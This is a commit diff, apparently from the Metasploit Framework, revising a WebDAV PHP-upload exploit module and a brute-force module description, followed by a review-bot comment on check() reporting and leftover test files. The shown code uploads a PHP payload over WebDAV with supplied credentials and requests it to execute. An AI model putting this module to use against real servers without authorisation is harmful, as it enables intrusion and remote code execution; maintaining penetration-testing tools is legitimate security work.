WebDAV: MR feedback

g0t mi1k
2026-04-16 22:05:06 +01:00
parent 71f37467d7
commit 94b4f577e0
2 changed files with 29 additions and 26 deletions
+1 -1
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
This module attempts to authenticate to HTTP services that
require Basic, Digest, or WebDAV authentication.
It will probe URIs to identify endpoints requiring authentication (HTTP 401)
and then perform brute-force the login.
and then perform brute-force login attempts.
},
'Author' => [ 'hdm' ],
'References' => [
@@ -13,14 +13,14 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Deprecated
moved_from 'exploits/windows/http/xampp_webdav_upload_php'
def initialize
def initialize(_info = {})
super(
'Name' => 'WebDAV PHP Upload',
'Description' => %q{
This module exploits weak WebDAV passwords, which may be
on a on XAMPP server.
It uses supplied credentials to upload a PHP payload and
execute it.
This module exploits WebDAV which also has PHP enabled,
such as found on XAMPP servers.
It can use do by using any supplied credentials to upload via WebDAV,
a PHP payload and then execute it.
},
'Author' => [
'theLightCosine',
@@ -69,13 +69,13 @@ class MetasploitModule < Msf::Exploit::Remote
def print_res_code(res, res_creds)
if res.code == 401
print_warning 'Creds may be required' if res_creds.empty?
print_warning 'Creds may be incorrect' if !res_creds.empty?
print_warning 'Creds may be incorrect' if !res_creds.empty?
end
end
def report_webdav_service(res, creds)
header_server = res.headers['Server']
vprint_status "Server: #{header_server.strip}"
header_server = res.headers['Server'].to_s.strip
vprint_status "Server: #{header_server}"
opts = {
ip: rhost,
@@ -106,6 +106,10 @@ class MetasploitModule < Msf::Exploit::Remote
}
)
[opts, service]
end
def report_webdav_creds(opts, service)
# XXXX Otherwise `vuln`'s "Service" is "none" when doing check(), and different when doing exploit()
report_vuln(
host: opts[:ip],
@@ -160,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
# Record results!
report_webdav_service(res, res_creds)
opts, service = report_webdav_service(res, res_creds)
# First see if it already exists (it really shouldn't)
vprint_status "Checking for test file: #{test_url}"
@@ -168,11 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => test_url
}.merge(res_creds), 10)
return Exploit::CheckCode::Unknown unless res
unless res.code == 404
print_error "The test file may already exists (HTTP #{res.code})"
return Exploit::CheckCode::Unknown # Need to try again with a different file
end
return Exploit::CheckCode::Unknown("The test file may already exists (HTTP #{res.code})") unless res.code == 404 # Need to try again with a different file
# Try to create it
vprint_status "Attempting to upload: #{test_url}"
@@ -183,24 +183,24 @@ class MetasploitModule < Msf::Exploit::Remote
}.merge(res_creds), 10)
return Exploit::CheckCode::Unknown unless res
unless res.code == 201
print_error "Error with upload request (HTTP #{res.code}, should be 201)"
## Often its HTTP 201
unless res.code.to_i.between?(200, 299)
print_error "Error with upload request (HTTP #{res.code}, should be 2xx)"
print_res_code(res, res_creds)
return Exploit::CheckCode::Safe
end
# Record results!
report_webdav_creds(opts, service)
# Try to run it
vprint_status "Checking if created: #{test_url}"
res = send_request_cgi({
'uri' => test_url
}.merge(res_creds))
return Exploit::CheckCode::Unknown unless res
unless res.code.to_i.between?(200, 299)
print_error "Error with exploit request (HTTP #{res.code}, should be 2xx)"
print_error "Error with exploit request (Response doesn't match payload) - Missing PHP?" unless res.body.match(payload)
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe("Error with exploit request (HTTP #{res.code}, should be 2xx)") unless res.code.to_i.between?(200, 299)
return Exploit::CheckCode::Safe("Error with exploit request (Response doesn't match payload) - Missing PHP?") unless res.body.to_s.include?(payload)
# Clean up
vprint_status "Attempting to delete: #{test_url}"
@@ -227,11 +227,12 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'PUT',
'data' => payload.raw
}.merge(res_creds), 10)
unless (res && (res.code == 201))
## Often its HTTP 201
unless res&.code&.between?(200, 299)
print_error 'Failed to upload file!'
if res
print_error "Error with upload request (HTTP #{res.code}, should be 201)"
print_error "Error with upload request (HTTP #{res.code}, should be 2xx)"
print_res_code(res, res_creds)
else
print_error 'No response received from server'
@@ -240,7 +241,9 @@ class MetasploitModule < Msf::Exploit::Remote
return
end
report_webdav_service(res, res_creds)
# Record results!
opts, service = report_webdav_service(res, res_creds)
report_webdav_creds(opts, service)
print_status 'Attempting to execute payload'
# Very short timeout because the request may never return if we're sending a socket payload
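Review bot: In the `check` hunk at `@@ -183,24 +183,24 @@`, `report_webdav_creds(opts, service)` runs as soon as the PUT returns 2xx, but the two `return Exploit::CheckCode::Safe(...)` lines after it can still reject the target, so a host reported as Safe may already carry the entry written by `report_vuln` (the first call visible in `report_webdav_creds`). Those early returns also sit above the `# Clean up` step, so on that path the uploaded test file appears to stay on the tested server; the body-mismatch case is a new exit, since the old code only printed that message inside the non-2xx branch. I would move `report_webdav_creds(opts, service)` below the two checks and send the delete request before returning Safe. Both `check` and `report_webdav_creds` continue outside the visible hunks, so this should be confirmed against the full file.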